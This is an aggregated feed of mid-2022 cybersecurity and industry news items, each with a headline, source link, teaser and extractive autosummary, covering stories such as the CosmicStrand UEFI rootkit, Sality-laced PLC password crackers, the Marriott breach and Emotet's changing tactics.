    An unknown Chinese-speaking threat actor has been attributed to a new kind of sophisticated UEFI firmware rootkit called CosmicStrand. "The rootkit is located in the firmware images of Gigabyte or ASUS motherboards, and we noticed that all these images are related to designs using the H81 chipset," Kaspersky researchers said in a new report published today. "This suggests that a common "

    Autosummary: The "shellcodes received from the [command-and-control] server might be stagers for attacker-supplied PE executables, and it is very likely that many more exist," Kaspersky noted, adding it found a total of two versions of the rootkit, one which was used between the end of 2016 and mid-2017, and the latest variant, which was active in 2020. "

    ---

    Intel partners with MediaTek to manufacture new chips for a range of smart edge devices

    industry
    2022-07-25 https://www.helpnetsecurity.com/2022/07/26/intel-mediatek/
    

    Intel and MediaTek announced a partnership to manufacture chips using Intel Foundry Services’ (IFS) process technologies. The agreement is designed to help MediaTek build a supply chain through the addition of a new foundry partner with capacity in the United States and Europe. MediaTek plans to use Intel process technologies to manufacture multiple chips for a range of smart edge devices. IFS offers a manufacturing platform with technologies optimized for high performance, low power and … More →

    The post Intel partners with MediaTek to manufacture new chips for a range of smart edge devices appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    CosmicStrand, a new sophisticated UEFI firmware rootkit linked to China

    industry
    2022-07-25 https://securityaffairs.co/wordpress/133658/malware/cosmicstrand-uefi-firmware-rootkit.html
    

    Kaspersky uncovered a new UEFI firmware rootkit, tracked as CosmicStrand, which it attributes to an unknown Chinese-speaking threat actor.  Researchers from Kaspersky have spotted a UEFI firmware rootkit, named CosmicStrand, which has been attributed to an unknown Chinese-speaking threat actor. This malware was first spotted by Chinese firm Qihoo360 in 2017. The researchers were not […]

    The post CosmicStrand, a new sophisticated UEFI firmware rootkit linked to China appeared first on Security Affairs.

    "

    Autosummary: The victims identified by the researchers are private individuals located in China, Vietnam, Iran, and Russia, with no link with any organization or industry vertical. "

    ---

    Dynatrace enhances its analytics capabilities for modern multicloud environments

    industry
    2022-07-23 https://www.helpnetsecurity.com/2022/07/23/dynatrace-platform-enhancement/
    

    Dynatrace announced it has enhanced its analytics capabilities for modern multicloud environments by unifying its AI-powered log analytics with its digital experience monitoring (DEM) capabilities, including Session Replay. This latest enhancement to the Dynatrace platform enables development teams to automatically gain deeper insights into specific user journeys by connecting logs to the user sessions that generated them. This additional context allows teams to use the platform’s DEM capabilities to analyze relevant user sessions and behavior … More →

    The post Dynatrace enhances its analytics capabilities for modern multicloud environments appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    SonicWall fixed critical SQLi in Analytics and GMS products

    industry
    2022-07-23 https://securityaffairs.co/wordpress/133579/security/sonicwall-critical-sqli.html
    

    Security company SonicWall released updates to address a critical SQL injection (SQLi) flaw in Analytics On-Prem and Global Management System (GMS) products. Security company SonicWall addressed a critical SQL injection (SQLi) vulnerability, tracked as CVE-2022-22280 (CVSS score 9.4), in Analytics On-Prem and Global Management System (GMS) products. “Improper Neutralization of Special Elements used in an […]

    The post SonicWall fixed critical SQLi in Analytics and GMS products appeared first on Security Affairs.

    "

    Autosummary: "

    ---

    CommScope partners with Microsoft to help transform industrial manufacturing

    industry
    2022-07-23 https://www.helpnetsecurity.com/2022/07/24/commscope-microsoft/
    

    CommScope announced that it has collaborated with Microsoft to create a converged private wireless network solution, enabling new low-latency and mobile applications to transform industrial manufacturing. CommScope successfully deployed the combined solution—using Microsoft Azure private MEC and CommScope CBRS access points—in its own manufacturing innovation center in Shakopee, Minnesota. Through this cloud-connected, low-latency private wireless network, CommScope is already improving both the operational efficiency and manufacturing agility of its facilities. This solution brings augmented reality … More →

    The post CommScope partners with Microsoft to help transform industrial manufacturing appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    How kitemarks are kicking off IoT regulation

    industry
    2022-07-22 https://www.helpnetsecurity.com/2022/07/22/how-kitemarks-are-kicking-off-iot-regulation/
    

    Regulation of the Internet of Things (IoT) has always been a contentious subject. Those against claim it stymies growth of a nascent industry, while those advocating for it argue it sees the adoption of industry best practices and helps establish standards. In an effort to straddle the divide, the Department for Digital, Culture, Media and Sport (DCMS) launched its Code of Practice back in 2018. Enshrined in this were 13 “Secure by Design” principles aimed … More →

    The post How kitemarks are kicking off IoT regulation appeared first on Help Net Security.

    "

    Autosummary: Baseline criteria will focus on asset identification, product configuration, data protection, interface access control, software updates, cybersecurity state awareness, documentation, information and query reception, information dissemination, and product education and awareness.The idea is to start with these controls before introducing other requirements further down the line, such as data protection, securely designed software/hardware, privacy, resilience, and user support.These cover issues including passwords and credentials, vulnerabilities and anomalies, software, secure configuration, communications, and usage of data.It differs, however, in that its recommendations are “outcome based”, no single conformity assessment will be adopted, and a single binary label has been suggested to act as a “seal of approval”. "

    ---

    SonicWall Issues Patch for Critical Bug Affecting its Analytics and GMS Products

    exploits industry
    2022-07-22 https://thehackernews.com/2022/07/sonicwall-issues-patch-for-critical-bug.html
    Network security company SonicWall on Friday rolled out fixes to mitigate a critical SQL injection (SQLi) vulnerability affecting its Analytics On-Prem and Global Management System (GMS) products. The vulnerability, tracked as CVE-2022-22280, is rated 9.4 for severity on the CVSS scoring system and stems from what the company describes is an "improper neutralization of special elements" used in "

    Autosummary: "

    ---

    Siemens Energy joins AWS Partner Network to provide customers with industrial cybersecurity solutions

    industry ciber
    2022-07-22 https://www.helpnetsecurity.com/2022/07/23/siemens-energy-aws/
    

    Siemens Energy announces it is joining the Amazon Web Services (AWS) Partner Network (APN), a global community of partners that leverage programs, expertise, and resources to build, market, and sell customer offerings. This expanded relationship includes listing Siemens Energy’s Managed Detection and Response (MDR) industrial cyber security solution in AWS Marketplace, a digital catalog that makes it easy for customers to find, compare, and immediately start using the software and services that run on AWS. … More →

    The post Siemens Energy joins AWS Partner Network to provide customers with industrial cybersecurity solutions appeared first on Help Net Security.

    "

    Autosummary: “The energy transition relies on seamlessly connecting physical assets with digital technologies to foster innovation, reduce emissions, and improve efficiency, but this future depends on strong cybersecurity across the whole supply chain,” said Leo Simonovich, Vice President and Global Head of Industrial Cyber, Siemens Energy. "

    ---

    Senet collaborates with Iota Communications to deliver wireless networks for smart infrastructure sensors

    industry
    2022-07-21 https://www.helpnetsecurity.com/2022/07/22/senet-iota-communications/
    

    Senet and Iota Communications announced a partnership to deliver LoRaWAN through both 915 MHz unlicensed spectrum and through IotaComm’s 800 MHz FCC-licensed spectrum network connectivity. The initial use cases will be focused on Smart Building, Smart City, and Critical Infrastructure applications. With this collaboration, and in addition to its use of the Senet platform for application and device management, IotaComm has also become a Senet Radio Access Network (RAN) operator and Senet LPWAN Virtual Network … More →

    The post Senet collaborates with Iota Communications to deliver wireless networks for smart infrastructure sensors appeared first on Help Net Security.

    "

    Autosummary: Through a combination of sensors, meters, and its Delphi360 wireless connectivity and data analytics platform, IotaComm provides an end-to-end smart building and smart city solution used by building managers, industrial site managers, and city planners to better manage the health, safety, and sustainability goals of their organizations and facilities. "

    ---

    ESET Research Podcast: Hot security topics at RSA or mostly hype?

    industry
    2022-07-20 https://www.welivesecurity.com/2022/07/20/eset-research-podcast-hot-security-topics-rsa-or-mostly-hype/
    

    Listen to Cameron Camp, Juraj Jánošík, and Filip Mazán discuss the use of machine learning in cybersecurity, followed by Cameron’s insights into the security of medical devices

    The post ESET Research Podcast: Hot security topics at RSA or mostly hype? appeared first on WeLiveSecurity

    "

    Autosummary: "

    ---

    Industrial cybersecurity leaders are making considerable headway

    industry ciber
    2022-07-18 https://www.helpnetsecurity.com/2022/07/18/industrial-cybersecurity-leaders-making-headway/
    

    Increased cyber threats and government directives have made cybersecurity a top priority among critical infrastructure organizations. A zero trust security architecture is the gold standard for blocking and containing threats, but there’s been heavy skepticism around the practicality of implementing zero trust in operational technology (OT) environments with the mix of legacy and modern equipment. A study from Wakefield Research suggests that despite this skepticism, industrial cybersecurity leaders are making significant progress. The survey conducted … More →

    The post Industrial cybersecurity leaders are making considerable headway appeared first on Help Net Security.

    "

    Autosummary: Tactics for accelerating implementations include integrating zero trust into organizational culture (68%); incorporating Identify and Access Management (IAM) practices or tools (66%), while avoiding “rip and replace” of existing networks and systems; setting a formal process to define zero trust goals (60%); assessing weakness in existing OT security architecture (60%). "

    ---

    Beware of password-cracking software for PLCs and HMIs!

    industry
    2022-07-18 https://www.helpnetsecurity.com/2022/07/18/password-cracking-plcs-hmis/
    

    A threat actor is targeting industrial engineers and operators with trojanized password-cracking software for programmable logic controllers (PLCs) and human-machine interfaces (HMIs), exploiting their pressing needs to turn industrial workstations into dangerous bots. According to Dragos researchers, the adversary seems not to be interested in disrupting industrial processes but making money. The password-cracking software also carries a dropper that infects the machine with Sality malware, which: Uses process injection and file infection to achieve persistence … More →

    The post Beware of password-cracking software for PLCs and HMIs! appeared first on Help Net Security.

    "

    Autosummary: These appear to be tailor-made to work on PLCs and HMIs by AutomationDirect, Omron, Siemens, ABB, Delta Automation, Fuji Electric, Mitsubishi Electric, Pro-Face, Vigor Electric, Weintek, Allen-Bradley, Panasonic, Fatek, IDEC Corp., and LG. "

    ---

    Hackers Distributing Password Cracking Tool for PLCs and HMIs to Target Industrial Systems

    industry
    2022-07-18 https://thehackernews.com/2022/07/hackers-distributing-password-cracking.html
    Industrial engineers and operators are the target of a new campaign that leverages password cracking software to seize control of Programmable Logic Controllers (PLCs) and co-opt the machines to a botnet. The software "exploited a vulnerability in the firmware which allowed it to retrieve the password on command," Dragos security researcher Sam Hanson said. "Further, the software was a malware "

    Autosummary: "

    ---

    ChaosSearch enhances log analytics capabilities to eliminate architectural complexity challenges

    industry
    2022-07-15 https://www.helpnetsecurity.com/2022/07/15/chaossearch-cloud-data-platform/
    

    ChaosSearch announced enhancements to its log analytics capabilities that make it easier for organizations to conduct exploratory and investigative analytics at scale. Built within the ChaosSearch Cloud Data Platform and now available to all customers, the augmented capabilities eliminate the architectural complexity and challenges created by traditional data platforms and dramatically improve time to insights, data reliability, and cost. The amount and variety of data being generated by businesses has grown exponentially in the last … More →

    The post ChaosSearch enhances log analytics capabilities to eliminate architectural complexity challenges appeared first on Help Net Security.

    "

    Autosummary: “If you’re using any of the existing database platforms today, there is simply no way you’re looking at more than one day’s worth of data at a time without an astronomical price tag,” said Thomas Hazel, Founder, CTO, Chief Scientist, ChaosSearch. "

    ---

    Samsung introduces 24Gbps GDDR6 DRAM to advance next-generation graphics cards

    industry
    2022-07-15 https://www.helpnetsecurity.com/2022/07/15/samsung-24gbps-gddr6-dram/
    

    Samsung announced that it has begun sampling the 16-gigabit (Gb) Graphics Double Data Rate 6 (GDDR6) DRAM featuring 24-gigabit-per-second (Gbps) processing speeds. Built on Samsung’s third-generation 10-nanometer-class (1z) process using extreme ultraviolet (EUV) technology, the new memory is designed to significantly advance the graphics performance for next-generation graphics cards (Video Graphics Arrays), laptops and game consoles, as well as artificial intelligence-based applications and high-performance computing (HPC) systems. “The explosion of data now being driven by … More →

    The post Samsung introduces 24Gbps GDDR6 DRAM to advance next-generation graphics cards appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    The proliferation of money mules and how behavioral biometrics can combat this form of fraud

    financial industry
    2022-07-15 https://www.helpnetsecurity.com/2022/07/15/money-mules-behavioral-biometrics-video/
    

    In the first half of 2022, BioCatch estimates fraudulent transfers to money mule accounts totaled $3 billion and that there are approximately 2 million mule accounts in the US. Additionally, researchers found that the average mule transaction amount is $1,500 – a low amount to avoid detection when executing mule campaigns at a large scale. In this Help Net Security video, Erin Englund, Threat Analytics Lead at BioCatch, explains what money mules are, why are … More →

    The post The proliferation of money mules and how behavioral biometrics can combat this form of fraud appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Password recovery tool infects industrial systems with Sality malware

    exploits industry
    2022-07-15 https://www.bleepingcomputer.com/news/security/password-recovery-tool-infects-industrial-systems-with-sality-malware/
    A threat actor is infecting industrial control systems (ICS) to create a botnet through password "cracking" software for programmable logic controllers (PLCs). [...] "

    Autosummary: Advertised on various social media platforms, the password recovery tools promise to unlock PLC and HMI (human-machine interface) terminals from Automation Direct, Omron, Siemens, Fuji Electric, Mitsubishi, LG, Vigor, Pro-Face, Allen Bradley, Weintek, ABB, and Panasonic. "

    ---

    Tainted password-cracking software for industrial systems used to spread P2P Sality bot

    industry
    2022-07-15 https://securityaffairs.co/wordpress/133281/malware/sality-malware-industrial-systems.html
    

    Dragos researchers uncovered a small-scale campaign targeting industrial engineers and operators with Sality malware. During a routine vulnerability assessment, Dragos researchers discovered a campaign targeting industrial engineers and operators with Sality malware. Threat actors behind the campaign used multiple accounts across several social media platforms to advertise password-cracking software for Programmable Logic Controller (PLC), Human-Machine […]

    The post Tainted password-cracking software for industrial systems used to spread P2P Sality bot appeared first on Security Affairs.

    "

    Autosummary: The password recovery software is advertised as working against industrial systems from ABB, Allen Bradley, Automation Direct, Fuji Electric, LG, Vigor, Mitsubishi, Omron, Panasonic, Pro-Face, Siemens, and Weintek. "

    ---

    Kudelski IoT Secure IP increases hardware security for semiconductor manufacturers

    industry
    2022-07-14 https://www.helpnetsecurity.com/2022/07/14/kudelski-iot-secure-ip/
    

    Kudelski IoT launched its Secure IP portfolio, giving semiconductor manufacturers robust cryptographic capabilities when integrated into their system on chip (SoC) products. Companies benefit from a rich array of security services, which are more powerful integrated in hardware than software, while also enabling compliance with most common industry security standards including NIST, FIPS, PSA and SESIP Level 3 or higher. “Silicon hardware-based security offers better protection from manipulation and interference than its software-based counterpart because … More →

    The post Kudelski IoT Secure IP increases hardware security for semiconductor manufacturers appeared first on Help Net Security.

    "

    Autosummary: “We see increasing regulation and demand for security in almost every IoT market, ranging from consumer IoT, automotive, industrial, telco, medical, and asset tracking,” said Frédéric Thomas, CTO of Kudelski IoT. "

    ---

    Ericsson partners with Thales and Qualcomm to deploy 5G networks into space

    industry
    2022-07-11 https://www.helpnetsecurity.com/2022/07/12/ericsson-thales-qualcomm/
    

    Ericsson, Thales, and Qualcomm Technologies are planning to take 5G out of this world and across a network of Earth-orbiting satellites. After having each conducted detailed research, which included multiple studies and simulations, the parties plan to enter smartphone-use-case-focused testing and validation of 5G non-terrestrial networks (5G NTN). The result could effectively mean that a future 5G smartphone could use 5G connectivity anywhere on Earth and provide complete global coverage for wideband data services, including … More →

    The post Ericsson partners with Thales and Qualcomm to deploy 5G networks into space appeared first on Help Net Security.

    "

    Autosummary: Erik Ekudden, Senior Vice President and Chief Technology Officer, Ericsson, says: “This testing and validation cooperation between Ericsson, Thales and Qualcomm Technologies will be a major milestone in the history of communications as the ultimate result could effectively mean that no matter where you are on Earth – in the middle of an ocean or the remotest forest – high-end, secure and cost-effective connectivity will be available through collaborative 5G satellite and terrestrial connectivity.” "

    ---

    Apple slaps hard against ‘mercenary’ surveillance-as-a-service industry

    industry
    2022-07-07 https://www.computerworld.com/article/3666688/apple-slaps-hard-against-mercenary-surveillance-as-a-service-industry.html#tk.rss_security
    

    Apple has struck a big blow against the mercenary “surveillance-as-a-service” industry, introducing a new, highly secure Lockdown Mode to protect individuals at the greatest risk of targeted attacks. The company is also offering millions of dollars to support research to expose such threats.

    Starting in iOS 16, iPadOS 16 and macOS Ventura, and available now in the latest developer-only betas, Lockdown Mode hardens security defenses and limits the functionalities sometimes abused by state-sponsored surveillance hackers. Apple describes this protection as “sharply reducing the attack surface that potentially could be exploited by highly targeted mercenary spyware.”

    To read this article in full, please click here

    "

    Autosummary: “We congratulate [Apple] for providing protection to human rights defenders, heads of state, lawyers, activists, journalists, and more,” tweeted the EFF, a privacy advocacy group. Apple is also making a $10 million grant, plus any damages awarded from the lawsuit it is pursuing against NSO Group, to support organizations that investigate, expose, and prevent highly targeted cyberattacks, including those created by private companies developing state-sponsored mercenary spyware.Victims have included journalists, politicians, civil society advocates, activists, and diplomats, so while the numbers are small, the chilling impact of such surveillance is vast. Ford Foundation Tech and Society Program director Lori McGlinchey said: “The global spyware trade targets human rights defenders, journalists, and dissidents; it facilitates violence, reinforces authoritarianism, and supports political repression. “Apple’s newly released Lockdown Mode will reduce the attack surface, increase costs for spyware firms, and thus make it much harder for repressive governments to hack high-risk users,” said John Scott-Railton, senior researcher at the Citizen Lab at the University of Toronto"s Munk School of Global Affairs and Public Policy. "

    ---

    North Korea-linked APTs use Maui Ransomware to target the Healthcare industry

    exploits ransomware industry
    2022-07-07 https://securityaffairs.co/wordpress/132978/malware/maui-ransomware-joint-alert.html
    

    US authorities have issued a joint advisory warning of North Korea-linked APTs using Maui ransomware in attacks against the Healthcare sector. The FBI, CISA, and the U.S. Treasury Department issued a joint advisory that warn of North-Korea-linked threat actors using Maui ransomware in attacks aimed at organizations in the Healthcare sector. “The Federal Bureau of […]

    The post North Korea-linked APTs use Maui Ransomware to target the Healthcare industry appeared first on Security Affairs.

    "

    Autosummary: "

    ---

    Marriott confirms data breach and a failed extortion attempt

    financial industry
    2022-07-06 https://www.bleepingcomputer.com/news/security/marriott-confirms-data-breach-and-a-failed-extortion-attempt/
    Hotel giant Marriott International confirmed this week that it was hit by another data breach after an unknown threat actor managed to breach one of its properties and steal 20 GB worth of files. [...] "

    Autosummary: " Data breach affected 300-400 individuals While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information. "

    ---

    Google to delete location data of trips to abortion clinics

    industry
    2022-07-06 https://blog.malwarebytes.com/privacy-2/2022/07/google-to-delete-location-data-of-trips-to-abortion-clinics/
    

    Google upped it privacy efforts by deleting location history of visits to abortion clinics.

    The post Google to delete location data of trips to abortion clinics appeared first on Malwarebytes Labs.

    "

    Autosummary: These include abortion clinics, addiction treatment facilities, counseling centers, domestic violence shelters, fertility centers, and other places deemed as sensitive locations. "

    ---

    Marriott hit by new data breach and a failed extortion attempt

    financial industry
    2022-07-06 https://www.bleepingcomputer.com/news/security/marriott-hit-by-new-data-breach-and-a-failed-extortion-attempt/
    Hotel giant Marriott International confirmed this week that it was hit by another data breach after an unknown threat actor managed to breach one of its properties and steal 20 GB worth of files. [...] "

    Autosummary: " Data breach affected 300-400 individuals While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information. "

    ---

    Marriott International suffered a new data breach, attackers stole 20GB of data

    financial industry
    2022-07-06 https://securityaffairs.co/wordpress/132943/data-breach/marriott-new-data-breach.html
    

    Hotel chain Marriott International suffered a new data breach, a threat actor has stolen 20GB from the company. Hotel chain Marriott International confirmed it has suffered a new data breach after a threat actor stole 20GB of files from one of its properties. The attacker compromised the network at the BWI Airport Marriott Maryland  (BWIA), […]

    The post Marriott International suffered a new data breach, attackers stole 20GB of data appeared first on Security Affairs.

    "

    Autosummary: “Marriott acknowledged that while most of the data acquired by GNN was what Marriott described as non-sensitive internal business files, they will be notifying approximately 300-400 individuals and any regulators, as required. "

    ---

    Marriott confirms another data breach after hotel got hacked

    financial industry
    2022-07-06 https://www.bleepingcomputer.com/news/security/marriott-confirms-another-data-breach-after-hotel-got-hacked/
    Hotel giant Marriott International confirmed this week that it was hit by another data breach after an unknown threat actor managed to breach one of its properties and steal 20 GB worth of files. [...] "

    Autosummary: " Data breach affected 300-400 individuals While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information. "

    ---

    MetricStream appoints Gaurav Kapoor and Prasad Sabbineni as Co-CEOs

    industry
    2022-07-05 https://www.helpnetsecurity.com/2022/07/06/metricstream-gaurav-kapoor-prasad-sabbineni/
    

    MetricStream announced that Gaurav Kapoor and Prasad Sabbineni have been appointed as co-Chief Executive Officers. MetricStream has grown consistently over the last decade to become an established market leader in the GRC space. Over the past two years, MetricStream benefited from Bruce Dahlgren’s leadership as CEO by expanding the go-to-market with fresh branding, a simplified product portfolio, strategic partnerships, and accelerated GRC SaaS leadership. Last quarter, Dahlgren moved to an advisory role and helped transition … More →

    The post MetricStream appoints Gaurav Kapoor and Prasad Sabbineni as Co-CEOs appeared first on Help Net Security.

    "

    Autosummary: He oversaw technology for enterprise GRC functions of Risk Management, Compliance, Internal Audit, Information Security, Third-Party Management as well as Finance, Treasury, HR, Data, across the entire bank globally at Citi. "

    ---

    NXM Autonomous Security platform protects space infrastructure and IoT devices from cyberattacks

    industry ciber
    2022-07-01 https://www.helpnetsecurity.com/2022/07/01/nxm-autonomous-security-platform/
    

    NXM Labs unveiled its NXM Autonomous Security platform that prevents hackers from gaining unauthorized access to commercial, industrial, medical, or consumer internet of things (IoT) devices. Tested in collaboration with the Jet Propulsion Laboratory (JPL), California Institute of Technology (Caltech), NXM successfully demonstrated the ability of its technology to enable future Mars rovers to automatically defend themselves and recover from cyberattacks. Caltech manages JPL on behalf of the National Aeronautics and Space Administration (NASA). NXM’s … More →

    The post NXM Autonomous Security platform protects space infrastructure and IoT devices from cyberattacks appeared first on Help Net Security.

    "

    Autosummary: "

    ---

    Siemens and NVIDIA join forces to enable industrial metaverse

    industry
    2022-06-30 https://www.helpnetsecurity.com/2022/07/01/siemens-nvidia/
    

    Siemens and NVIDIA announced an expansion of their partnership to enable the industrial metaverse and increase use of AI-driven digital twin technology that will help bring industrial automation to a new level. As a first step in this collaboration, the companies plan to connect Siemens Xcelerator, the open digital business platform, and NVIDIA Omniverse, a platform for 3D-design and collaboration. This will enable an industrial metaverse with physics-based digital models from Siemens and real-time AI … More →

    The post Siemens and NVIDIA join forces to enable industrial metaverse appeared first on Help Net Security.

    "

    Autosummary: As a first step in this collaboration, the companies plan to connect Siemens Xcelerator, the open digital business platform, and NVIDIA Omniverse, a platform for 3D-design and collaboration. "

    ---

    New "FabricScape" Bug in Microsoft Azure Service Fabric Impacts Linux Workloads

    exploits industry
    2022-06-29 https://thehackernews.com/2022/06/new-fabricscape-bug-in-microsoft-azure.html
    Cybersecurity researchers from Palo Alto Networks Unit 42 disclosed details of a new security flaw affecting Microsoft"s Service Fabric that could be exploited to obtain elevated permissions and seize control of all nodes in a cluster. The issue, which has been dubbed FabricScape (CVE-2022-30137), could be exploited on containers that are configured to have runtime access. It has been remediated "

    Autosummary: "The vulnerability enables a bad actor, with access to a compromised container, to escalate privileges and gain control of the resource"s host SF node and the entire cluster," Microsoft said as part of the coordinated disclosure process. "

    ---

    APT Hackers Targeting Industrial Control Systems with ShadowPad Backdoor

    industry
    2022-06-29 https://thehackernews.com/2022/06/apt-hackers-targeting-industrial.html
    Entities located in Afghanistan, Malaysia, and Pakistan are in the crosshairs of an attack campaign that targets unpatched Microsoft Exchange Servers as an initial access vector to deploy the ShadowPad malware. Russian cybersecurity firm Kaspersky, which first detected the activity in mid-October 2021, attributed it to a previously unknown Chinese-speaking threat actor. Targets include "

    Autosummary: "However, those systems can be a valuable source of highly confidential information and may provide the attackers with a backdoor to other, more secured, areas of infrastructures." "

    ---

    Critical Security Flaws Identified in CODESYS ICS Automation Software

    industry
    2022-06-27 https://thehackernews.com/2022/06/critical-security-flaws-identified-in.html
    CODESYS has released patches to address as many as 11 security flaws that, if successfully exploited, could result in information disclosure and a denial-of-service (DoS) condition, among others.  "These vulnerabilities are simple to exploit, and they can be successfully exploited to cause consequences such as sensitive information leakage, PLCs entering a severe fault state, and arbitrary code "

    Autosummary: "

    ---

    Italy Data Protection Authority Warns Websites Against Use of Google Analytics

    industry
    2022-06-27 https://thehackernews.com/2022/06/italy-data-protection-authority-warns.html
    Following the footsteps of Austria and France, the Italian Data Protection Authority has become the latest regulator to find the use of Google Analytics to be non-compliant with E.U. data protection regulations. The Garante per la Protezione dei Dati Personali, in a press release published last week, called out a local web publisher for using the widely used analytics tool in a manner that "

    Autosummary: "

    ---

    The surveillance-as-a-service industry needs to be brought to heel

    industry
    2022-06-24 https://www.computerworld.com/article/3665052/the-surveillance-as-a-service-industry-needs-to-be-brought-to-heel.html#tk.rss_security
    

    Here we go again: another example of government surveillance involving smartphones from Apple and Google has emerged, and it shows how sophisticated government-backed attacks can become and why there"s justification for keeping mobile platforms utterly locked down.

    What has happened?

    I don’t intend to focus too much on the news, but in brief it is as follows:

    • Google’s Threat Analysis Group has published information revealing the hack.
    • Italian surveillance firm RCS Labs created the attack.
    • The attack has been used in Italy and Kazakhstan, and possibly elsewhere.
    • Some generations of the attack are wielded with help from ISPs.
    • On iOS, attackers abused Apple’s enterprise certification tools that enable in-house app deployment.
    • Around nine different attacks were used.

    The attack works like this: The target is sent a unique link that aims to trick them into downloading and installing a malicious app. In some cases, the spooks worked with an ISP to disable data connectivity to trick targets into downloading the app to recover that connection.

    To read this article in full, please click here

    "

    Autosummary: And while Apple, Google, and everyone else remain committed to a cat-and-mouse game to prevent such criminality, closing exploits where they can, the risk is that any government-mandated back door or device security flaw will eventually slip into the commercial markets, from which it will reach the criminal ones. Not only this, but these private surveillance companies are enabling dangerous hacking tools to proliferate, while giving these high-tech snooping facilities available to governments — some of which seem to enjoy spying on dissidents, journalists, political opponents, and human rights workers.As part of that, they must respect EU law, judicial review, criminal procedural rights and agree to no import of illegal intelligence, no political abuse of national security and to support civil society. "

    ---

    How Emotet is changing tactics in response to Microsoft’s tightening of Office macro security

    industry
    2022-06-16 https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/
    

    Emotet malware is back with ferocious vigor, according to ESET telemetry in the first four months of 2022. Will it survive the ever-tightening controls on macro-enabled documents?

    The post How Emotet is changing tactics in response to Microsoft’s tightening of Office macro security appeared first on WeLiveSecurity

    "

    Autosummary: Recognizing this potential abuse of macros, during the heyday of Word 97 Microsoft introduced the first built-in security feature in Word that blocked Visual Basic for Applications (VBA) macros from running: This feature continued to be developed in later versions of Office, now probably most familiar via the yellow Message Bar with the “Enable Content” button introduced in Office 2010: Since then, two clicks have been typically required to enable macros: first, clicking on “Enable Editing”, which removes the document from Protected View, a security feature in place since Office 2010 that provides a read-only, sandboxed environment; second, clicking on “Enable Content”, which allows the macros to run.Specifically, Guildma stored all of its malicious modules, including a couple of tools from Nirsoft for extracting saved credentials from popular email clients and web browsers, as the streams of the single desktop.ini file: desktop.ini:nauwuygiaa.jpg (MailPassView) (MailPassView) desktop.ini:nauwuygiab.jpg (BrowserPassView)… For targeting air-gapped networks, malicious actors have used streams to hide malicious components within otherwise innocuous-looking files on USB drives. When double-clicked, a shortcut file can launch a target resource, in this case, a PowerShell script that downloaded and executed Emotet: Most detections were in Japan (28%), Italy (16%), and Mexico (11%). In an earlier test campaign between April 4th and April 19th, the Emotet operators attracted victims to a ZIP archive, stored on OneDrive, containing Microsoft Excel Add-in (XLL) files, which are used to add custom functions to Excel.Identifier is a well-known stream name that modern browsers and some other applications automatically add or propagate to files to indicate their zone: the internet, the intranet, the trusted zone, the restricted zone, or the local machine. "

    ---

    Why Industry 4.0 must think more like Apple

    industry
    2022-05-31 https://www.computerworld.com/article/3662131/why-industry-40-must-think-more-like-apple.html#tk.rss_security
    

    For industrial applications, the Internet of Things risks becoming the Internet of Thieves. Perhaps industries making use of connected solutions should take a leaf out the Apple book and lock down their infrastructure.

    What the ethical hackers say

    As digital processes become deeply embedded across every industry, it makes sense that industrial control systems were tested at this year’s Pwn2Own contest. Hackers were asked to seek out vulnerabilities in industrial software and systems.

    Contest winners Daan Keuper and Thijs Alkemade found that once they managed to break into the IT networks used at these companies, it was “relatively easy” to then cause havoc with systems and equipment.

    To read this article in full, please click here

    "

    Autosummary: IT understands this, of course, which is why industrial IoT deployments tend to secure the IT networks they use, but this also means that if those networks are penetrated, much of the deployed equipment lacks additional protection. Louis Priem, consultant at ICT Group, said, “Systems in factory environments typically run 24/7, so there is very little opportunity to patch vulnerabilities. "

    ---